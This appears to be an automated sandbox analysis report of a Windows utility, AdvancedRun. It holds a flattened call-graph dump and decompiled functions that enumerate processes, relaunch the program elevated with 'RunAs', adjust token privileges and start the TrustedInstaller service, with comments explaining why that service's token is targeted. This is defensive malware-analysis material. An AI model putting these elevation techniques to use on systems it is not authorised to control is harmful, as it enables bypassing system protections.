5620->5621 5622 403a2a 5620->5622 5626 4038df 5621->5626 5627 402caf GetWindowPlacement 5621->5627 5623 403a41 5622->5623 5628 403ec3 2 API calls 5622->5628 5763 402d2e 5623->5763 5629 403ec3 2 API calls 5626->5629 5627->5626 5628->5623 5630 4038e6 5629->5630 5632 40467a 5 API calls 5630->5632 5634 403920 5630->5634 5631 403954 5666 40399e 5631->5666 5693 402923 memset 5631->5693 5633 4038f9 5632->5633 5635 403908 5633->5635 5636 4038fd 5633->5636 5634->5631 5640 40149f 12 API calls 5634->5640 5675 404415 5635->5675 5669 4045ba 5636->5669 5637 4039b8 5644 4039c6 5637->5644 5713 4037dd memset memset 5637->5713 5639 403965 5694 401000 5639->5694 5647 403937 5640->5647 5645 4039d5 5644->5645 5726 4035af 5644->5726 5652 4039e4 5645->5652 5733 40344d memset 5645->5733 5653 4013e1 9 API calls 5647->5653 5648 403904 5654 40467a 5 API calls 5648->5654 5658 403a07 5652->5658 5662 405b81 16 API calls 5652->5662 5659 403946 5653->5659 5655 403913 5654->5655 5660 403b16 17 API calls 5655->5660 5656 401000 wcsncat 5661 40398c 5656->5661 5658->5623 5749 4034f0 5658->5749 5692 4054b9 free free 5659->5692 5660->5634 5698 402b79 5661->5698 5665 4039f4 5662->5665 5744 40acfc SHGetMalloc 5665->5744 5666->5637 5701 4036d5 memset memset 5666->5701 5670 4045c7 5669->5670 5671 4043f8 RegOpenKeyExW 5670->5671 5672 4045d8 5671->5672 5673 4045e0 7 API calls 5672->5673 5674 404675 5672->5674 5673->5674 5674->5648 5676 404422 5675->5676 5677 4043f8 RegOpenKeyExW 5676->5677 5678 404433 5677->5678 5679 4045b3 5678->5679 5680 40443b memset _snwprintf 5678->5680 5679->5648 5767 409ecc RegCreateKeyExW 5680->5767 5682 40448b 5683 4045a8 RegCloseKey 5682->5683 5768 409ef4 wcslen RegSetValueExW 5682->5768 5683->5679 5685 4044aa RegCloseKey memset 5769 404ad9 GetModuleFileNameW 5685->5769 5687 4044e0 5687->5683 5688 4044f1 GetDriveTypeW 5687->5688 5688->5683 5689 404527 memset memset _snwprintf _snwprintf 5688->5689 5770 409f1a 5689->5770 5692->5631 5693->5639 5695 401037 5694->5695 5696 40103b 
5695->5696 5697 40100e wcsncat 5695->5697 5696->5656 5697->5695 5699 405ce7 GetModuleHandleW 5698->5699 5700 402b91 DialogBoxParamW 5699->5700 5700->5666 5702 405b81 16 API calls 5701->5702 5703 403734 5702->5703 5704 405b81 16 API calls 5703->5704 5705 403744 5704->5705 5779 405236 memset 5705->5779 5708 405b81 16 API calls 5709 403766 GetSaveFileNameW 5708->5709 5710 4037d9 5709->5710 5711 4037b9 wcscpy 5709->5711 5710->5637 5782 40365e 5711->5782 5714 405b81 16 API calls 5713->5714 5715 40383d 5714->5715 5716 405b81 16 API calls 5715->5716 5717 40384d 5716->5717 5718 405236 6 API calls 5717->5718 5719 403866 5718->5719 5720 405b81 16 API calls 5719->5720 5721 40386f 5720->5721 5792 40507a GetOpenFileNameW 5721->5792 5723 40388c 5724 40389c 5723->5724 5725 40365e 32 API calls 5723->5725 5724->5644 5725->5724 5727 401d40 220 API calls 5726->5727 5728 4035dd 5727->5728 5729 4035eb 5728->5729 5795 4047d2 5728->5795 5731 4035fb FreeLibrary 5729->5731 5732 4035f7 5731->5732 5732->5645 5734 405b81 16 API calls 5733->5734 5735 403490 5734->5735 5736 405b81 16 API calls 5735->5736 5737 4034a0 5736->5737 5738 405236 6 API calls 5737->5738 5739 4034b9 5738->5739 5740 405b81 16 API calls 5739->5740 5741 4034c2 5740->5741 5742 40507a 2 API calls 5741->5742 5743 4034dc 5742->5743 5743->5652 5745 40ad16 SHBrowseForFolderW 5744->5745 5747 40ad6c 5744->5747 5746 40ad4a SHGetPathFromIDListW 5745->5746 5745->5747 5746->5747 5748 40ad5c wcscpy 5746->5748 5747->5658 5748->5747 5750 4034fd 5749->5750 5810 402923 memset 5750->5810 5752 40350b 5811 406670 5752->5811 5755 40a909 memset 5756 40354a 5755->5756 5821 402cd5 5756->5821 5759 403586 5824 4067ac 5759->5824 5760 403569 _ultow 5760->5759 5762 40359d 5762->5622 5764 402d62 5763->5764 5765 402d3b 5763->5765 5765->5764 5766 402d52 EndDialog 5765->5766 5766->5764 5767->5682 5768->5685 5769->5687 5777 409eb3 RegOpenKeyExW 5770->5777 5772 409f35 5773 4045a5 5772->5773 5778 409ef4 wcslen RegSetValueExW 5772->5778 5773->5683 5775 409f4c 
RegCloseKey 5775->5773 5777->5772 5778->5775 5780 40526f _snwprintf wcslen memcpy wcslen memcpy 5779->5780 5780->5780 5781 40375d 5780->5781 5781->5708 5783 403670 5782->5783 5784 40a0eb 2 API calls 5783->5784 5785 4036a1 5784->5785 5786 40177c 20 API calls 5785->5786 5787 4036b0 5786->5787 5788 403616 9 API calls 5787->5788 5790 4036b9 5788->5790 5789 4036cf 5789->5710 5790->5789 5791 403ec3 2 API calls 5790->5791 5791->5789 5793 4050dd 5792->5793 5794 4050cd wcscpy 5792->5794 5793->5723 5794->5723 5796 4047df 5795->5796 5797 4047e6 GetLastError 5796->5797 5798 4047ee 5796->5798 5797->5798 5801 404706 5798->5801 5802 404723 LoadLibraryExW 5801->5802 5803 40473a FormatMessageW 5801->5803 5802->5803 5806 404735 5802->5806 5804 404753 wcslen 5803->5804 5805 404778 wcscpy 5803->5805 5807 404760 wcscpy 5804->5807 5808 40476d LocalFree 5804->5808 5809 404787 _snwprintf MessageBoxW 5805->5809 5806->5803 5807->5808 5808->5809 5809->5729 5810->5752 5840 404fa4 memset 5811->5840 5813 40668b ??2@YAPAXI 5814 4066c9 ??2@YAPAXI 5813->5814 5816 4066ea ??2@YAPAXI 5814->5816 5818 40670b ??2@YAPAXI 5816->5818 5820 403521 memset 5818->5820 5820->5755 5822 402b79 2 API calls 5821->5822 5823 402ce3 5822->5823 5823->5759 5823->5760 5841 406746 5824->5841 5827 4067cd 5829 4067e0 5827->5829 5831 4055d1 free 5827->5831 5828 4055d1 free 5830 4067c6 ??3@YAXPAX 5828->5830 5832 4067f3 5829->5832 5834 4055d1 free 5829->5834 5830->5827 5833 4067d9 ??3@YAXPAX 5831->5833 5835 4055d1 free 5832->5835 5838 406806 5832->5838 5833->5829 5836 4067ec ??3@YAXPAX 5834->5836 5837 4067ff ??3@YAXPAX 5835->5837 5836->5832 5837->5838 5839 406837 free 5838->5839 5839->5762 5840->5813 5842 406751 ??3@YAXPAX 5841->5842 5843 406758 5841->5843 5842->5843 5844 406766 5843->5844 5845 40675f ??3@YAXPAX 5843->5845 5846 406770 ??3@YAXPAX 5844->5846 5847 406777 5844->5847 5845->5844 5846->5847 5848 406797 5847->5848 5849 406790 ??3@YAXPAX 5847->5849 5850 406787 ??3@YAXPAX 5847->5850 5848->5827 5848->5828 5849->5848 
5850->5849 5851 407e24 memset memset 5852 407e6e 5851->5852 5853 407250 2 API calls 5852->5853 5854 407e7a _snwprintf 5853->5854 5855 407343 6 API calls 5854->5855 5856 407ea7 5855->5856 5857 40b225 __dllonexit 5858 40aba5 5859 40ac15 5858->5859 5860 40abb7 BeginDeferWindowPos 5858->5860 5863 40ac26 5859->5863 5869 402ec8 6 API calls 5859->5869 5861 402e22 3 API calls 5860->5861 5864 40abdc 5861->5864 5865 402e22 3 API calls 5864->5865 5866 40abeb 5865->5866 5867 402e22 3 API calls 5866->5867 5868 40abfb EndDeferWindowPos InvalidateRect 5867->5868 5868->5863 5869->5863 5870 40a726 5871 40a733 5870->5871 5873 40a750 5870->5873 5874 406d12 5871->5874 5875 406d27 5874->5875 5876 406d3b 5874->5876 5880 4033c7 SendMessageW 5875->5880 5878 4033c7 SendMessageW 5876->5878 5879 406d2c 5878->5879 5879->5873 5881 4033df 5880->5881 5881->5879 5882 402b26 5883 402b32 ExitProcess 5882->5883 5884 402b3a 5882->5884 5885 405d6a 4 API calls 5884->5885 5887 402b56 5884->5887 5885->5887 5886 402b5d SetWindowLongW 5888 402b6a 5886->5888 5887->5886 5887->5888 5889 40b6a6 5890 40b6b6 5889->5890 5891 40b6af ??3@YAXPAX 5889->5891 5892 40b6c6 5890->5892 5893 40b6bf ??3@YAXPAX 5890->5893 5891->5890 5894 40b6d6 5892->5894 5895 40b6cf ??3@YAXPAX 5892->5895 5893->5892 5896 40b6e6 5894->5896 5897 40b6df ??3@YAXPAX 5894->5897 5895->5894 5897->5896 5898 40b5a8 5899 40171f memset 5898->5899 5900 40b5b3 5899->5900 5901 40b23c 2 API calls 5900->5901 5902 40b5d6 5901->5902 5903 40a1a9 5904 409e82 4 API calls 5903->5904 5905 40a1d7 5904->5905 5906 402aaa 5907 402ab6 5906->5907 5908 405e0a 8 API calls 5907->5908 5912 402add 5907->5912 5909 402aca 5908->5909 5916 40588e 5909->5916 5911 402b6a 5912->5911 5913 405d6a 4 API calls 5912->5913 5915 402b56 5912->5915 5913->5915 5914 402b5d SetWindowLongW 5914->5911 5915->5911 5915->5914 5917 4058a9 ??2@YAPAXI memset memcpy 5916->5917 5919 405898 5916->5919 5918 4058ec ??3@YAXPAX 5917->5918 5920 4058f3 5917->5920 5918->5920 5919->5917 5919->5920 5920->5912 5921 
40a92b 5922 40a980 _itow 5921->5922 5923 40a93e 5921->5923 5924 40a947 5922->5924 5923->5924 5925 40a961 wcschr 5923->5925 5926 40a944 5923->5926 5925->5924 5926->5924 5928 404ed0 5926->5928 5929 404ee1 5928->5929 5930 404ee9 FileTimeToSystemTime 5928->5930 5929->5930 5932 404f69 wcscpy 5929->5932 5931 404ef8 5930->5931 5930->5932 5931->5932 5933 404f00 GetDateFormatW GetTimeFormatW wcscpy wcscat wcscat 5931->5933 5934 404f78 5932->5934 5933->5934 5934->5924 4537 40a12c 4540 409e82 4537->4540 4539 40a14c 4541 409ea0 GetPrivateProfileIntW 4540->4541 4542 409e8e 4540->4542 4541->4539 4545 409d12 memset _itow WritePrivateProfileStringW 4542->4545 4544 409e9b 4544->4539 4545->4544 5938 405dac 5939 40b550 5938->5939 5940 405db9 memset GetDlgCtrlID 5939->5940 5941 405edd 5 API calls 5940->5941 5942 405ded 5941->5942 5943 405e03 5942->5943 5944 405df3 SetWindowTextW 5942->5944 5944->5943 5945 40a82d 5946 402ddd 6 API calls 5945->5946 5947 40a842 5946->5947 5948 402d78 10 API calls 5947->5948 5949 40a849 GetDlgItem 5948->5949 5960 4068ec 5949->5960 5953 40a8ce 5977 407f8d 5953->5977 5954 40a885 5954->5953 5974 403213 5954->5974 5957 40a8d5 5987 40ab39 5957->5987 5961 4068fd 5960->5961 5962 406746 5 API calls 5961->5962 5963 406907 ??2@YAPAXI ??2@YAPAXI 5962->5963 5964 40695c memcpy memcpy 5963->5964 5965 4069a1 5964->5965 5965->5964 5966 4069d9 ??2@YAPAXI ??2@YAPAXI 5965->5966 5969 405b81 16 API calls 5965->5969 5967 406a18 5966->5967 5968 406a23 5966->5968 5996 406607 5967->5996 6000 40686c 5968->6000 5969->5965 5972 406a69 5973 408157 SendMessageW SendMessageW 5972->5973 5973->5954 5975 403239 SendMessageW 5974->5975 5976 40322f wcslen 5974->5976 5975->5954 5976->5975 5978 408053 5977->5978 5979 407fb3 5977->5979 5980 408089 11 API calls 5978->5980 5981 40805b ImageList_Create ImageList_SetImageCount SendMessageW 5978->5981 5982 408024 ImageList_Create ImageList_SetImageCount 5979->5982 5983 407fbb memset memset GetWindowsDirectoryW SHGetFileInfoW 5979->5983 6017 40331d 
SendMessageW 5980->6017 5981->5980 5984 408044 SendMessageW 5982->5984 5983->5984 5984->5978 5986 408142 SendMessageW 5986->5957 5988 40a8f5 SetFocus 5987->5988 5989 40ab45 5987->5989 5989->5988 5990 406ccb SendMessageW 5989->5990 5991 40ab56 _wcsicmp 5989->5991 5990->5989 5991->5989 5992 40ab73 5991->5992 5993 40684f SendMessageW 5992->5993 5994 40ab80 SendMessageW 5993->5994 5995 40684f SendMessageW 5994->5995 5995->5988 5997 406611 ??2@YAPAXI 5996->5997 5998 40660e 5996->5998 5999 406637 5997->5999 5998->5997 5999->5968 5999->5999 6001 4055d1 free 6000->6001 6002 406875 6001->6002 6003 4055d1 free 6002->6003 6004 40687d 6003->6004 6005 4055d1 free 6004->6005 6006 406885 6005->6006 6007 4055d1 free 6006->6007 6008 40688d 6007->6008 6009 40559a 4 API calls 6008->6009 6010 4068a0 6009->6010 6011 40559a 4 API calls 6010->6011 6012 4068aa 6011->6012 6013 40559a 4 API calls 6012->6013 6014 4068b4 6013->6014 6015 40559a 4 API calls 6014->6015 6016 4068be 6015->6016 6016->5972 6017->5986 6018 4030ad 6019 4030d3 6018->6019 6020 4030b6 6018->6020 6021 40304d 3 API calls 6020->6021 6022 4030bf 6021->6022 6022->6019 6023 4030c3 _wtoi 6022->6023 6023->6019 6024 407ead 6025 407eb5 6024->6025 6026 407ebc 6024->6026 6027 405b81 16 API calls 6025->6027 6028 407eba 6027->6028 6029 406ab1 6031 406ac2 6029->6031 6030 406b07 6032 406b7b 6030->6032 6034 406b5d _wcsicmp 6030->6034 6031->6030 6033 406aff _wcsicmp 6031->6033 6033->6030 6034->6030 4532 40a33b FindResourceW 4533 40a354 SizeofResource 4532->4533 4536 40a37e 4532->4536 4534 40a365 LoadResource 4533->4534 4533->4536 4535 40a373 LockResource 4534->4535 4534->4536 4535->4536 4546 40b23c 4549 40b216 4546->4549 4548 40b245 4550 40b225 __dllonexit 4549->4550 4551 40b21f _onexit 4549->4551 4550->4548 4551->4550

                                                                  Executed Functions

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 93%
                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				void* _v12;
                                                                  				char _v16;
                                                                  				char _v24;
                                                                  				char _v32;
                                                                  				char _v40;
                                                                  				char _v48;
                                                                  				intOrPtr _v52;
                                                                  				char _v576;
                                                                  				long _v580;
                                                                  				intOrPtr _v1112;
                                                                  				long _v1128;
                                                                  				void _v1132;
                                                                  				void* _v1136;
                                                                  				void _v1658;
                                                                  				char _v1660;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t41;
                                                                  				long _t49;
                                                                  				void* _t50;
                                                                  				intOrPtr* _t66;
                                                                  				struct HINSTANCE__* _t68;
                                                                  				void* _t71;
                                                                  				void* _t83;
                                                                  				void* _t84;
                                                                  				void* _t85;
                                                                  
                                                                  				_t78 = _a4;
                                                                  				E004099D4(_a4 + 0x28);
                                                                  				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                  				_v12 = _t41;
                                                                  				memset( &_v1132, 0, 0x228);
                                                                  				_t84 = _t83 + 0xc;
                                                                  				_v1136 = 0x22c;
                                                                  				Process32FirstW(_v12,  &_v1136); // executed
                                                                  				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                  					E004090AF( &_v580);
                                                                  					_t49 = _v1128;
                                                                  					_v580 = _t49;
                                                                  					_v52 = _v1112;
                                                                  					_t50 = OpenProcess(0x410, 0, _t49);
                                                                  					_v8 = _t50;
                                                                  					if(_t50 != 0) {
                                                                  						L4:
                                                                  						_v1660 = 0;
                                                                  						memset( &_v1658, 0, 0x208);
                                                                  						_t85 = _t84 + 0xc;
                                                                  						E004098F9(_t78, _v8,  &_v1660);
                                                                  						if(_v1660 != 0) {
                                                                  							L10:
                                                                  							E0040920A( &_v576,  &_v1660);
                                                                  							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                  							_t84 = _t85 + 0x14;
                                                                  							CloseHandle(_v8);
                                                                  							_t78 = _a4;
                                                                  							L11:
                                                                  							E004099ED(_t78 + 0x28,  &_v580);
                                                                  							continue;
                                                                  						}
                                                                  						_v16 = 0x104;
                                                                  						if( *0x41c8e0 == 0) {
                                                                  							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                  							if(_t68 != 0) {
                                                                  								 *0x41c8e0 = 1;
                                                                  								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                  							}
                                                                  						}
                                                                  						_t66 =  *0x41c8e4;
                                                                  						if(_t66 != 0) {
                                                                  							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                  						}
                                                                  						goto L10;
                                                                  					}
                                                                  					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                  						goto L11;
                                                                  					}
                                                                  					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                  					_v8 = _t71;
                                                                  					if(_t71 == 0) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L4;
                                                                  				}
                                                                  				return CloseHandle(_v12);
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                  • memset.MSVCRT ref: 0040962E
                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                  • memset.MSVCRT ref: 004096C6
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                  • API String ID: 239888749-1740548384
                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 75%
                                                                  			E00401C26(long _a4) {
                                                                  				struct _SHELLEXECUTEINFOW _v68;
                                                                  				void _v582;
                                                                  				char _v584;
                                                                  				void _v1110;
                                                                  				char _v1112;
                                                                  				long _t23;
                                                                  				int _t36;
                                                                  				int _t41;
                                                                  				void* _t43;
                                                                  				long _t44;
                                                                  
                                                                  				_t44 = 0;
                                                                  				_t23 = GetCurrentProcessId();
                                                                  				_v584 = 0;
                                                                  				memset( &_v582, 0, 0x1fe);
                                                                  				_v1112 = 0;
                                                                  				memset( &_v1110, 0, 0x208);
                                                                  				E00404AD9( &_v1112);
                                                                  				_push(_t23);
                                                                  				_push(0);
                                                                  				_push(_a4);
                                                                  				_push(L"/SpecialRun %I64x %d");
                                                                  				_push(0xff);
                                                                  				_push( &_v584);
                                                                  				L0040B1EC();
                                                                  				memset( &(_v68.fMask), 0, 0x38);
                                                                  				_v68.lpFile =  &_v1112;
                                                                  				_v68.lpParameters =  &_v584;
                                                                  				_v68.cbSize = 0x3c;
                                                                  				_v68.lpVerb = L"RunAs";
                                                                  				_v68.fMask = 0x40;
                                                                  				_v68.nShow = 5;
                                                                  				_t36 = ShellExecuteExW( &_v68); // executed
                                                                  				_t43 = _v68.hProcess;
                                                                  				if(_t36 == 0) {
                                                                  					_t44 = GetLastError();
                                                                  				} else {
                                                                  					WaitForSingleObject(_t43, 0x5dc);
                                                                  					_a4 = 0;
                                                                  					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                  					if(_t41 != 0 && _a4 != 0x103) {
                                                                  						_t44 = _a4;
                                                                  					}
                                                                  				}
                                                                  				return _t44;
                                                                  			}

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                  • memset.MSVCRT ref: 00401C4F
                                                                  • memset.MSVCRT ref: 00401C68
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                  • memset.MSVCRT ref: 00401C9B
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                  • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                  • API String ID: 903100921-3385179869
                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                  				void* _v8;
                                                                  				intOrPtr _v12;
                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                  				void* __esi;
                                                                  				_Unknown_base(*)()* _t16;
                                                                  				_Unknown_base(*)()* _t18;
                                                                  				long _t19;
                                                                  				_Unknown_base(*)()* _t22;
                                                                  				_Unknown_base(*)()* _t24;
                                                                  				struct HINSTANCE__** _t35;
                                                                  				void* _t37;
                                                                  
                                                                  				_t37 = __eflags;
                                                                  				_t35 = __eax;
                                                                  				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                  					return GetLastError();
                                                                  				}
                                                                  				_t16 = E00408F72(_t35);
                                                                  				__eflags = _t16;
                                                                  				if(_t16 != 0) {
                                                                  					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                  					__eflags = _t24;
                                                                  					if(_t24 != 0) {
                                                                  						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                  					}
                                                                  				}
                                                                  				_v24.PrivilegeCount = 1;
                                                                  				_v12 = 2;
                                                                  				_a4 = _v8;
                                                                  				_t18 = E00408F72(_t35);
                                                                  				__eflags = _t18;
                                                                  				if(_t18 != 0) {
                                                                  					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                  					__eflags = _t22;
                                                                  					if(_t22 != 0) {
                                                                  						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                  					}
                                                                  				}
                                                                  				_t19 = GetLastError();
                                                                  				FindCloseChangeNotification(_v8); // executed
                                                                  				return _t19;
                                                                  			}

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                  Strings
                                                                  • AdjustTokenPrivileges
                                                                  • LookupPrivilegeValueW
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                  • API String ID: 616250965-1253513912
                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  Basic blocks (id: address range, API called) and edges, as exported from the interactive graph:
                                                                  • 399: 401306-40132b OpenServiceW -> 400, 401
                                                                  • 400: 401350-40135b CloseServiceHandle
                                                                  • 401: 40132d-40133a QueryServiceStatus -> 402, 403
                                                                  • 402: 40133c-401340 -> 403, 404
                                                                  • 403: 40134d-40134e CloseServiceHandle -> 400
                                                                  • 404: 401342-40134b StartServiceW -> 403
                                                                  C-Code - Quality: 100%
                                                                  			E00401306(void* _a4) { // _a4: service control manager handle, closed here on every path
                                                                  				intOrPtr _v28; // SERVICE_STATUS.dwCurrentState, i.e. offset 4 of _v32
                                                                  				struct _SERVICE_STATUS _v32;
                                                                  				void* _t5;
                                                                  				int _t12;
                                                                  				void* _t14;

                                                                  				_t12 = 0; // executed
                                                                  				// 0x34 = SERVICE_QUERY_STATUS | SERVICE_START | SERVICE_STOP. TrustedInstaller is the Windows
                                                                  				// Modules Installer; its process owns protected system files and keys that Administrators
                                                                  				// cannot touch, so its token is a common target for running "as TrustedInstaller", and the
                                                                  				// service has to be running for that. SERVICE_START on it requires an elevated caller.
                                                                  				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                  				_t14 = _t5;
                                                                  				if(_t14 != 0) {
                                                                  					// Start only if the service is not already SERVICE_RUNNING (4)
                                                                  					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                  						_t12 = StartServiceW(_t14, 0, 0); // no service arguments
                                                                  					}
                                                                  					CloseServiceHandle(_t14);
                                                                  				}
                                                                  				CloseServiceHandle(_a4);
                                                                  				return _t12; // non-zero only when StartServiceW succeeded; 0 if already running, not found or access denied
                                                                  			}

                                                                  				Decompiler address column for the lines above, flattened: 0x00401319 0x0040131b 0x00401327 0x0040132b 0x0040133a 0x0040134b 0x0040134b 0x0040134e 0x0040134e 0x00401353 0x0040135b

                                                                  APIs
                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                  Strings
                                                                  • TrustedInstaller
                                                                  Memory Dump Source
